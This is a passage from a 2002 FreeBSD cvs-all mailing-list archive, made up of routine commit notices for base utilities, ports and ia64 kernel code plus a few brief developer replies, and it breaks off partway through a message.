<200206200447.g5K4lpN82315@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 21:47:51 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 21:47:51 PDT Modified files: . modules Log: jpegpixi --> ports/graphics/jpegpixi Revision Changes Path 1.5392 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 22:21: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4E4EA37B40A; Wed, 19 Jun 2002 22:20:50 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K5KoB90118; Wed, 19 Jun 2002 22:20:50 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206200520.g5K5KoB90118@freefall.freebsd.org> From: Juli Mallett Date: Wed, 19 Jun 2002 22:20:50 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/bin/sh mktokens parser.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/19 22:20:50 PDT Modified files: bin/sh mktokens parser.c Log: Minor const cleanup. Don't discard qualifiers we don't need to discard. Revision Changes Path 1.8 +3 -3 src/bin/sh/mktokens 1.40 +2 -2 src/bin/sh/parser.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 22:21:53 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C3C9537B409; Wed, 19 Jun 2002 22:21:43 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K5LhQ90186; Wed, 19 Jun 2002 22:21:43 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206200521.g5K5LhQ90186@freefall.freebsd.org> From: Juli Mallett Date: Wed, 19 Jun 2002 22:21:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/bin/sh jobs.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/19 22:21:43 PDT Modified files: bin/sh jobs.c Log: Remove two unused variables. Revision Changes Path 1.45 +0 -2 src/bin/sh/jobs.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 22:27:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 801DD37B408; Wed, 19 Jun 2002 22:27:33 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K5RX890675; Wed, 19 Jun 2002 22:27:33 -0700 (PDT) (envelope-from pat) Message-Id: <200206200527.g5K5RX890675@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 22:27:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/nhc98 Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 22:27:33 PDT Modified files: lang/nhc98 Makefile Log: USE_REINPLACE has to be defined before including bsd.port.pre.mk Revision Changes Path 1.12 +2 -1 ports/lang/nhc98/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 22:28: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1323737B405; Wed, 19 Jun 2002 22:28:03 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K5S3R90743; Wed, 19 Jun 2002 22:28:03 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206200528.g5K5S3R90743@freefall.freebsd.org> From: Juli Mallett Date: Wed, 19 Jun 2002 22:28:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/bin/ed ed.h main.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/19 22:28:02 PDT Modified files: bin/ed ed.h main.c Log: We have a place for extern declarations of global variables in ed.h, do not use main() to do it locally. Revision Changes Path 1.17 +2 -0 src/bin/ed/ed.h 1.23 +0 -3 src/bin/ed/main.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 22:34:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B392937B411; Wed, 19 Jun 2002 22:34:43 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K5Yhp91980; Wed, 19 Jun 2002 22:34:43 -0700 (PDT) (envelope-from tjr) Message-Id: <200206200534.g5K5Yhp91980@freefall.freebsd.org> From: "Tim J. Robbins" Date: Wed, 19 Jun 2002 22:34:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/tr extern.h str.c tr.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/19 22:34:43 PDT Modified files: (Branch: RELENG_4) usr.bin/tr extern.h str.c tr.c Log: MFC: Handle zero length first string with -c option, style/WARNS changes tr.c rev. 1.9-1.11, str.c rev. 1.11-1.12, extern.h 1.3 Revision Changes Path 1.2.6.1 +2 -1 src/usr.bin/tr/extern.h 1.10.2.1 +36 -34 src/usr.bin/tr/str.c 1.8.2.1 +12 -11 src/usr.bin/tr/tr.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 22:35:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0C52737B409; Wed, 19 Jun 2002 22:35:41 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K5Zfk92138; Wed, 19 Jun 2002 22:35:41 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206200535.g5K5Zfk92138@freefall.freebsd.org> From: Juli Mallett Date: Wed, 19 Jun 2002 22:35:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/false false.c src/usr.bin/true true.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/19 22:35:40 PDT Modified files: usr.bin/false false.c usr.bin/true true.c Log: A function which takes no arguments has an argument list spelled (void) in the world of ANSI C. Revision Changes Path 1.3 +1 -1 src/usr.bin/false/false.c 1.3 +1 -1 src/usr.bin/true/true.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 22:58:53 2002 Delivered-To: cvs-all@freebsd.org Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by hub.freebsd.org (Postfix) with ESMTP id 9A32137B40A; Wed, 19 Jun 2002 22:58:45 -0700 (PDT) Received: from hades.hell.gr (patr530-b219.otenet.gr [212.205.244.227]) by mailsrv.otenet.gr (8.12.3/8.12.3) with ESMTP id g5K5whqK000909; Thu, 20 Jun 2002 08:58:44 +0300 (EEST) Received: from hades.hell.gr (hades [127.0.0.1]) by hades.hell.gr (8.12.4/8.12.4) with ESMTP id g5K5wgdv068217; Thu, 20 Jun 2002 08:58:42 +0300 (EEST) (envelope-from keramida@FreeBSD.org) Received: (from charon@localhost) by hades.hell.gr (8.12.4/8.12.4/Submit) id g5K5wgCZ068216; Thu, 20 Jun 2002 08:58:42 +0300 (EEST) (envelope-from keramida@FreeBSD.org) Date: Thu, 20 Jun 2002 08:58:42 +0300 From: Giorgos Keramidas To: Ying-Chieh Liao Cc: cvs-all@FreeBSD.org, committers@FreeBSD.org Subject: Differences of tvision and rhtvision (was: Re: cvs commit: ports/devel ...) Message-ID: <20020620055842.GB67975@hades.hell.gr> References: <200206171835.g5HIZQo97358@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206171835.g5HIZQo97358@freefall.freebsd.org> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 2002-06-17 11:35 +0000, Ying-Chieh Liao wrote: > ijliao 2002/06/17 11:35:25 PDT > > Modified files: > devel Makefile > Added files: > devel/rhtvision Makefile distinfo pkg-comment pkg-descr > pkg-plist > Log: > add rhtvision 1.1.4 > Complete C++ Text User Interface (TUI) library Do we know what the differences of rhtvision and tvision are? Just asking here, since I was thinking of installing tvision when I saw this commitlog. - Giorgos To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 23: 0:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7520E37B408; Wed, 19 Jun 2002 23:00:51 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K60pO95041; Wed, 19 Jun 2002 23:00:51 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206200600.g5K60pO95041@freefall.freebsd.org> From: Juli Mallett Date: Wed, 19 Jun 2002 23:00:51 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/bin/rcp extern.h rcp.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/19 23:00:51 PDT Modified files: bin/rcp extern.h rcp.c Log: Use size_t consistently and complete some uncompleted code resulting in a memory leak by assigning and freeing a variable appropriately as well as keeping track of the amount of allocated ram properly. MFC after: 1 month Revision Changes Path 1.8 +1 -1 src/bin/rcp/extern.h 1.32 +5 -2 src/bin/rcp/rcp.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 23: 9:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 817E437B413; Wed, 19 Jun 2002 23:09:43 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K69hn00269; Wed, 19 Jun 2002 23:09:43 -0700 (PDT) (envelope-from marcus) Message-Id: <200206200609.g5K69hn00269@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 23:09:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail Makefile ports/mail/balsa2 Makefile distinfo pkg-comment pkg-descr pkg-plist ports/mail/balsa2/files patch-aa patch-configure patch-ltmain.sh patch-po::Makefile.in.in patch-src_address-book-config.c patch-src_main.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 23:09:43 PDT Modified files: mail Makefile mail/balsa2 Makefile distinfo pkg-comment pkg-descr pkg-plist mail/balsa2/files patch-configure Added files: mail/balsa2/files patch-src_address-book-config.c patch-src_main.c Removed files: mail/balsa2/files patch-aa patch-ltmain.sh patch-po::Makefile.in.in Log: Add balsa2 after a repo copy from balsa. balsa2 is a mail reader (still quite unstable) for the GNOME 2 desktop environment. Revision Changes Path 1.304 +1 -0 ports/mail/Makefile 1.58 +20 -12 ports/mail/balsa2/Makefile 1.31 +1 -1 ports/mail/balsa2/distinfo 1.8 +0 -10 ports/mail/balsa2/files/patch-aa (dead) 1.2 +47 -11 ports/mail/balsa2/files/patch-configure 1.5 +0 -28 ports/mail/balsa2/files/patch-ltmain.sh (dead) 1.2 +0 -14 ports/mail/balsa2/files/patch-po::Makefile.in.in (dead) 1.1 +11 -0 ports/mail/balsa2/files/patch-src_address-book-config.c (new) 1.1 +11 -0 ports/mail/balsa2/files/patch-src_main.c (new) 1.3 +1 -1 ports/mail/balsa2/pkg-comment 1.5 +2 -2 ports/mail/balsa2/pkg-descr 1.22 +30 -77 ports/mail/balsa2/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 23:10:32 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E21137B408; Wed, 19 Jun 2002 23:10:20 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K6AKn00632; Wed, 19 Jun 2002 23:10:20 -0700 (PDT) (envelope-from marcus) Message-Id: <200206200610.g5K6AKn00632@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 23:10:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 23:10:19 PDT Modified files: . modules Log: balsa2 --> ports/mail/balsa2 Revision Changes Path 1.5393 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 23:21:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 02A3637B401; Wed, 19 Jun 2002 23:21:21 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K6LKR03103; Wed, 19 Jun 2002 23:21:20 -0700 (PDT) (envelope-from peter) Message-Id: <200206200621.g5K6LKR03103@freefall.freebsd.org> From: Peter Wemm Date: Wed, 19 Jun 2002 23:21:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/alpha/include runq.h src/sys/i386/include runq.h src/sys/ia64/include runq.h src/sys/powerpc/include runq.h src/sys/sparc64/include runq.h src/sys/kern kern_switch.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/19 23:21:20 PDT Modified files: sys/alpha/include runq.h sys/i386/include runq.h sys/ia64/include runq.h sys/powerpc/include runq.h sys/sparc64/include runq.h sys/kern kern_switch.c Log: Move the "- 1" into the RQB_FFS(mask) macro itself so that implementations can provide a base zero ffs function if they wish. This changes #define RQB_FFS(mask) (ffs64(mask)) foo = RQB_FFS(mask) - 1; to #define RQB_FFS(mask) (ffs64(mask) - 1) foo = RQB_FFS(mask); On some platforms we can get the "- 1" for free, eg: those that use the C code for ffs64(). Reviewed by: jake (in principle) Revision Changes Path 1.2 +1 -1 src/sys/alpha/include/runq.h 1.2 +1 -1 src/sys/i386/include/runq.h 1.2 +1 -1 src/sys/ia64/include/runq.h 1.28 +1 -2 src/sys/kern/kern_switch.c 1.2 +1 -1 src/sys/powerpc/include/runq.h 1.2 +1 -1 src/sys/sparc64/include/runq.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 23:23:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 185CB37B404; Wed, 19 Jun 2002 23:23:41 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K6Nfp03256; Wed, 19 Jun 2002 23:23:41 -0700 (PDT) (envelope-from peter) Message-Id: <200206200623.g5K6Nfp03256@freefall.freebsd.org> From: Peter Wemm Date: Wed, 19 Jun 2002 23:23:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/ia64/ia64 pmap.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/19 23:23:41 PDT Modified files: sys/ia64/ia64 pmap.c Log: Use the canonical pmap_{new,dispose,swapin,swapout}_proc() functions, in this case cut/pasted from sparc64 instead of messing with contigmalloc where it is not needed. Revision Changes Path 1.62 +111 -17 src/sys/ia64/ia64/pmap.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 23:25:29 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7BFD537B411; Wed, 19 Jun 2002 23:25:22 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K6PMG03454; Wed, 19 Jun 2002 23:25:22 -0700 (PDT) (envelope-from peter) Message-Id: <200206200625.g5K6PMG03454@freefall.freebsd.org> From: Peter Wemm Date: Wed, 19 Jun 2002 23:25:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/ia64/ia64 pmap.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/19 23:25:22 PDT Modified files: sys/ia64/ia64 pmap.c Log: panic rather than fault and explode if we fail to contigmalloc a kernel stack. This is still bad(TM), but at least we have a clue when we get hit when contigmalloc fails. Revision Changes Path 1.63 +3 -0 src/sys/ia64/ia64/pmap.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 23:29:58 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AD5BE37B41B; Wed, 19 Jun 2002 23:29:42 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K6Tgs03729; Wed, 19 Jun 2002 23:29:42 -0700 (PDT) (envelope-from peter) Message-Id: <200206200629.g5K6Tgs03729@freefall.freebsd.org> From: Peter Wemm Date: Wed, 19 Jun 2002 23:29:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/boot/efi/libefi bootinfo.c src/sys/boot/i386/libi386 bootinfo.c src/sys/boot/ia64/libski bootinfo.c src/sys/boot/sparc64/loader metadata.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/19 23:29:42 PDT Modified files: sys/boot/efi/libefi bootinfo.c sys/boot/i386/libi386 bootinfo.c sys/boot/ia64/libski bootinfo.c sys/boot/sparc64/loader metadata.c Log: Add boot_serial and boot_multicons variables to set RB_SERIAL and RB_MULTIPLE since this seems to be the easiest way to add these flags for non-forth loaders etc. Revision Changes Path 1.6 +2 -0 src/sys/boot/efi/libefi/bootinfo.c 1.33 +2 -0 src/sys/boot/i386/libi386/bootinfo.c 1.6 +2 -0 src/sys/boot/ia64/libski/bootinfo.c 1.6 +2 -0 src/sys/boot/sparc64/loader/metadata.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 23:45:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1BFEC37B404; Wed, 19 Jun 2002 23:45:44 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K6jic08373; Wed, 19 Jun 2002 23:45:44 -0700 (PDT) (envelope-from peter) Message-Id: <200206200645.g5K6jic08373@freefall.freebsd.org> From: Peter Wemm Date: Wed, 19 Jun 2002 23:45:44 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/ia64/ia32 imgact_ia32.c src/sys/ia64/ia64 support.s trap.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/19 23:45:43 PDT Modified files: sys/ia64/ia32 imgact_ia32.c sys/ia64/ia64 support.s trap.c Log: Use suword32/64 and fuword32/64 like elsewhere instead of inventing suhword/fuhword. Revision Changes Path 1.3 +13 -12 src/sys/ia64/ia32/imgact_ia32.c 1.13 +10 -8 src/sys/ia64/ia64/support.s 1.56 +4 -4 src/sys/ia64/ia64/trap.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 23:47:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 315AF37B400; Wed, 19 Jun 2002 23:47:45 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K6ljm08498; Wed, 19 Jun 2002 23:47:45 -0700 (PDT) (envelope-from peter) Message-Id: <200206200647.g5K6ljm08498@freefall.freebsd.org> From: Peter Wemm Date: Wed, 19 Jun 2002 23:47:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/ia64/ia64 trap.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/19 23:47:45 PDT Modified files: sys/ia64/ia64 trap.c Log: ia32 %edx return comes from td_retval[1], not td_retval[0] Obtained from: dfr Revision Changes Path 1.57 +1 -1 src/sys/ia64/ia64/trap.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 23:52:10 2002 Delivered-To: cvs-all@freebsd.org Received: from posti.pp.htv.fi (posti.pp.htv.fi [212.90.64.50]) by hub.freebsd.org (Postfix) with ESMTP id CB76237B40A; Wed, 19 Jun 2002 23:52:02 -0700 (PDT) Received: from cs78128057.pp.htv.fi ([62.78.128.57]) by posti.pp.htv.fi (8.11.1/8.11.1) with ESMTP id g5K6pwA15999; Thu, 20 Jun 2002 09:51:58 +0300 (EETDST) Subject: Re: cvs commit: doc/en_US.ISO8859-1/share/sgml authors.ent From: Ville =?ISO-8859-1?Q?Skytt=E4?= To: Giorgos Keramidas Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, knu@FreeBSD.org In-Reply-To: <20020620042349.GA62574@hades.hell.gr> References: <200206200420.g5K4KQ678927@freefall.freebsd.org> <20020620042349.GA62574@hades.hell.gr> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Mailer: Ximian Evolution 1.0.3 (1.0.3-6) Date: 20 Jun 2002 09:52:01 +0300 Message-Id: <1024555922.15948.2.camel@bobcat.ods.org> Mime-Version: 1.0 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Thu, 2002-06-20 at 07:23, Giorgos Keramidas wrote: > > Modified files: > > en_US.ISO8859-1/share/sgml authors.ent > > Log: > > Fix build of articles/contributors/ by adding an entity for &a.scop; >=20 > Ville, I didn't know what the proper letter for the last part of your > name was. If ä is not the right thing, feel free to jump in and > fix this by using the right entity. >=20 > Oh, and... Welcome aboard. Let's conquer the world :) Thanks, ä is correct. Sorry about the hassle :/ --=20 Ville Skytt=E4 scop at FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0: 3:40 2002 Delivered-To: cvs-all@freebsd.org Received: from cs.rice.edu (cs.rice.edu [128.42.1.30]) by hub.freebsd.org (Postfix) with ESMTP id 2D12E37B405; Thu, 20 Jun 2002 00:03:37 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by cs.rice.edu (Postfix) with ESMTP id 8FB3A4A9B8; Thu, 20 Jun 2002 02:03:36 -0500 (CDT) Received: by cs.rice.edu (Postfix, from userid 19572) id 15FB94A9AE; Thu, 20 Jun 2002 02:03:36 -0500 (CDT) Date: Thu, 20 Jun 2002 02:03:36 -0500 From: Alan Cox To: Peter Wemm Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/ia64/ia64 pmap.c Message-ID: <20020620070336.GG17003@cs.rice.edu> References: <200206200623.g5K6Nfp03256@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206200623.g5K6Nfp03256@freefall.freebsd.org> User-Agent: Mutt/1.3.28i X-Virus-Scanned: by AMaViS snapshot-20010714 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, Jun 19, 2002 at 11:23:41PM -0700, Peter Wemm wrote: > peter 2002/06/19 23:23:41 PDT > > Modified files: > sys/ia64/ia64 pmap.c > Log: > Use the canonical pmap_{new,dispose,swapin,swapout}_proc() functions, > in this case cut/pasted from sparc64 instead of messing with > contigmalloc where it is not needed. > > Revision Changes Path > 1.62 +111 -17 src/sys/ia64/ia64/pmap.c Could someone with an Alpha please try the sparc64 implementation of these functions as well? If that experiment is successful, then we can hoist these functions out of the machine-dependent code. Alan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 0: 6:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9F36637B406; Thu, 20 Jun 2002 00:06:22 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K76M514469; Thu, 20 Jun 2002 00:06:22 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206200706.g5K76M514469@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 00:06:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src MAINTAINERS X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 00:06:22 PDT Modified files: . MAINTAINERS Log: That's right, you can shove your xargs(1) issues in my direction, and I'm 